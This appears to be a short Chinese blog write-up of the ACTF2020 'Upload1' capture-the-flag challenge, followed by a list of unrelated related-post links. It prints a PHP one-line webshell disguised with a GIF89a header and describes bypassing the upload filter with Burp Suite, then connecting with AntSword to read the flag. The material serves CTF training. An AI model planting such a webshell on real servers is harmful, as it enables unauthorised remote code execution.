技术栈

[ACTF2020 新生赛]Upload1

不拿flag不改名2024-09-12 13:20

1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马

GIF89a? <script language="php">eval($_REQUEST[1])</script>

2、使用bp抓包修改后缀,点击发送

3、不关浏览器的代理,在bp中将该包放行

4、用蚁剑连接

5、在根目录中找到flag

上一篇:Ansible Tower与AWX:构建可视化的运维自动化解决方案
下一篇:鸿蒙开发(API 12 Beta6版)【通用属性协议】 网络篇
相关推荐
帅得不敢出门
33 分钟前
Android监听第三方播放获取音乐信息及包名
android·java
2503_92841156
1 小时前
10.9 鸿蒙创建和运行项目
android·华为·harmonyos
alexhilton
10 小时前
Kotlin互斥锁(Mutex):协程的线程安全守护神
android·kotlin·android jetpack
spencer_tseng
12 小时前
Eclipse 4.7 ADT (Android Development Tools For Eclipse)
android·java·eclipse
archko
14 小时前
android pdf框架-15,mupdf工具与其它
android·pdf
.豆鲨包
16 小时前
【Android】MVP架构模式
android·架构
代码会说话
16 小时前
i2c通讯
android·linux·嵌入式硬件·嵌入式
默|笙
19 小时前
【c++】set和map的封装
android·数据库·c++
kaikaile1995
19 小时前
PHP计算过去一定时间段内日期范围函数
android·开发语言·php
2501_92938265
20 小时前
电视盒子助手开心电视助手 v8.0 删除电视内置软件 电视远程控制ADB去除电视广告
android·windows·adb·开源软件·电视盒子
热门推荐
01BongoCat - 跨平台键盘猫动画工具02智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04GitHub 镜像站点052025羊城杯网络安全大赛 wp06UV安装并设置国内源07Linux下V2Ray安装配置指南08GitLab 零基础入门指南:从安装到项目管理全流程09Spring Boot 实现微信登录,So Easy !105大DOM/BOM核心考点:从入门到精通,让面试官眼前一亮